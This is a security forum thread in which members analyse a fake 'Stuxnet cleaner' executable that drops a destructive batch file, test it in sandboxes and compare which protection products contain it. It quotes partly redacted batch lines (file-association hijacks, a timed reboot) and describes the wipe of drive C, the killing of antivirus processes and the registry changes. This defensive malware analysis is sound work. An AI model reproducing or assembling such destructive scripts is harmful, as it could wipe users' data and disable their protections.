Fake Stuxnet cleaner = very nasty

It doesn't come much worse than this.

stuxnet-cleaner.exe





Originally Posted by a_d_13

Of course not many people are going change the extension from .exe to .bat and/or then run it But now the code is out there that means other idiots could make use of it, and release it as a .bat file. This could be delivered in the usual ways, and people tricked into running it, with possible devastating consequences

I have .bat protection, so i'd get alerted and prompted but i'm not sure how many others out there would be protected from running such a file, and then .....

Would people be protected from this scenario ?

If so how exactly ?

 

For me, the question isn't answerable w/o seeing an actual exploit and the way it attempts to trick the user into running it.

----
rich

 

The stuxnet cleaner executable creates the file Stuxnet Cleaner.bat in
*\Local Settings\Temp\1.tmp\Stuxnet Cleaner.bat, then executes the batch file.
Simple and skiddy as that.

 

Tried it without any security. System unbootable.
GesWall- Passed
CIS Default settings with AV turned off- It gave pop up and I opted to sandbox it. It deleted some start menu items, some jpg images from my desktop etc etc but system remained intact, rebooted fine( It will however succeed to delete some files from ur PC).

 

Well, I went to that forum to check it out, and agree with the second poster that it is a script kiddie thingy.

Surely, no respectable cybercriminal would write such a piece of code.

----
rich

 

I agree except with the word "respectable".

 

I use that word in an ironic sense.

My implication is that a respectable cybercriminal (respected in her/his profession; creditable; one committed to her/his work) wants to take over the computer for monetary gain, not to destroy it!


----
rich

 

OK

Script kiddie thingy indeed, i don't see the sense in releasing stuff like this. Well i guess they don't have any !

@ stackz

Hi, i searched for ALL temp files and didn't see it in *\Local Settings\Temp\1.tmp\Stuxnet Cleaner.bat ? Only as shown below. Did you test it, if so how ?

Yes nasty

Nice to see GesWall Passed With CIS you were still alive but some issues Thanks for testing

*

Well i ran it after enabling ShadowDefender & allowing it via ProcessGuard.

Stuxnet-Cleaner.exe appeared in running processes.

An E.tmp folder was created in Temp



Inside there was this



Found a locked file tmp.edb in C:\WINDOWS\system32\CatRoot2



Found some info on tmp.edb -

http://technet.microsoft.com/en-us/library/bb124808(EXCHG.65).aspx - which didn't seem relevant !

W32/Archiles.worm - http://vil.nai.com/vil/content/v_141963.htm - Coincidence ?

Not sure what that is right now ? but as it was created over 3 hours before i ran the test, i don't see how it's connected !

Didn't notice anything unusual with Autoruns/RkU/Gmer

Killed Stuxnet-Cleaner.exe with RkU, cut & pasted E.tmp/Stuxnet Cleaner.bat to a new folder excluded from deletion by SD, and rebooted. SD returned my comp to as before

Obviously this malware is designed to do it's nasty deeds on reboot, and i wasn't going to allow that, guess why But i wanted to see what i could find that it installed & ready to run on boot etc. I expect i maybe missed something/s ? as i don't see how that .bat could have autorun on boot from within that folder, without some other help !

Edit

virscan.org = Only BitDefender detected Stuxnet Cleaner.bat - BehavesLike:BAT.Delete (suspected)

 

I had a chance to have a closer look at this piece of rubbish. The batch file is embedded in the the executable's resource file. It gets written to *\Local Settings\Temp\[Single Char].tmp\Stuxnet Cleaner.bat
The batch file is deleted after execution.

The batch file:
Changes file association for .exe, .mp3, .jpg, .bmp and .gif.
Deletes every file on C drive that it can.
Kills explorer.exe, firefox.exe. iexplore.exe and avgnt.exe (avira)
Reboots the computer - obviously if it gets this far, then the computer would be unbootable.

The program appears to be of German origin.

 

Thanks for the nice analysis.

 

Thanks stackz for analysis It really seems work of script kiddy.

 

Re - \Local Settings\Temp\[Single Char].tmp\Stuxnet Cleaner.bat

So the [Single Char] folder it creates appears to be a random one, as mine was E.tmp not 1.tmp.

After running Stuxnet-Cleaner.exe,

I was able to create .gif file with no file association etc problems.

It didn't delete ANY file on C drive.

Didn't kill explorer.exe/firefox.exe/avgnt.exe and all were running.

That's why i curious to find out how the batch file actually executes itself, after being created by running Stuxnet-Cleaner.exe. As it didn't happen on my comp, and Script Defender would have prompted me for permission to run a .bat file anyway, which it didn't.

Also as i mentioned earlier, i'm wondering how many people out there would be protected, or not, from a .bat file auto running ? The person using W7 with big problems in the - www.trojaner-board.de - obviously had it run !

@ stackz

From post # 9, does that mean you ran it as i asked ?

Or that you found the info elsewhere, if so where ?

How does the batch file execute itself, and then do what it does ?

TIA

 

DefenseWall is also able to contain the effects of this malware..

 

Prevx stopped it.

 

The fake stuxnet cleaner contains a line to wipe C drive so dunno why it needs to do anything else as that does enough damage in itself?

Kernelmode Topic

 

Prevx didn't detect Anything when i did the test and still does Not detect Stuxnet-Cleaner.exe or Stuxnet Cleaner.bat in my folder ?

Which is very strange, considering your experience ?

 

@ Franklin

Hi, the thing is, as you can see from my test, it didn't cause ANY damage to my comp !

 

I've run it, unpacked it, debugged it etc
Batch file is launched using ShellExecuteExA, which will mean cmd.exe runs the batch file.
The executable resource manifest shows requestedExecutionLevel level="highestAvailable", which means in admin account it runs as admin or prompts for admin where UAC is involved, in LUA it will run as limited user.

If the stuxnet cleaner runs successfully, the first thing you'll notice is that its icon changes to wma icon and cmd.exe is using a lot of cpu cycles.

Code:

[FONT="Courier New"][SIZE="2"]@echo off
assoc .exe=WMAFile // change file association
assoc    <snip>
assoc    <snip>
assoc    <snip>
assoc    <snip>
del      <snip>  // recursive delete file command
taskkill <snip>  // kill process
taskkill <snip>
taskkill <snip>
taskkill <snip>
shutdown -r -t 600 -c "Opfer" // reboots after 600 seconds, additional comment "Opfer" = victim [/SIZE][/FONT]

 

XP VM's - Sandboxie and Bufferzone both contain any changes to their secure zones.

Returnil and Shadow Defender don't contain any changes realtime but things are back to normal after reboot.

Line from Stuxnet-Cleaner.exe saved as "Delete System.bat" - 3/43 - Trojan.BAT.KillFiles.gc

Stuxnet-Cleaner.exe - 19/42 - Trojan:Win32/Delfiles.Q

BSA report via Sandboxie:

[ General information ]
* File name: c:\documents and settings\ven\desktop\stuxnet-cleaner.exe
* File length: 75776 bytes
* File signature: UPX [com] *
* MD5 hash: 8fab1b7e5e11adaf4d57afeb652d7832
* SHA1 hash: 16c8dd9b634248016930f81b3e7f66bfbef8e219
* SHA256 hash: 872ea49751b04bf2ea1e07eeb96384f812b880bdb648bb1f4641b0cb0304723e

Then proceeds to delete every file it can mainly those not in use.

[ Changes to registry ]
* Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.bmp
old value "Default=Paint.Picture"
* Modifies value "Default=WMAFile" in key HKEY_LOCAL_MACHINE\software\Classes\.exe
old value "Default=exefile"
* Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.gif
old value "Default=giffile"
* Modifies value "Default=THEMEFile" in key HKEY_LOCAL_MACHINE\software\Classes\.jpg
old value "Default=jpegfile"
* Modifies value "Default=VBSFile" in key HKEY_LOCAL_MACHINE\software\Classes\.mp3
old value "Default=mp3file"
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Process/window information ]
* Opens a service named "LanmanWorkstation".
* Creates a mutex "ZonesCounterMutex".
* Creates a mutex "ZonesCacheCounterMutex".
* Creates a mutex "ZonesLockedCacheCounterMutex".
* Creates process "(null),"C:\Documents and Settings\Ven\Local Settings\Temp\2.tmp\Stuxnet Cleaner.bat" ,C:\Documents and Settings\USER\Desktop\".
* Creates a mutex "SHIMLIB_LOG_MUTEX".

 

@ stackz

@ Franklin

Thanks for the extra info etc, wish you'ld posted it all earlier

Well they say, you mileage may vary, and it certainly did with me. Interesting how different malware affects people comps, or not, in different ways !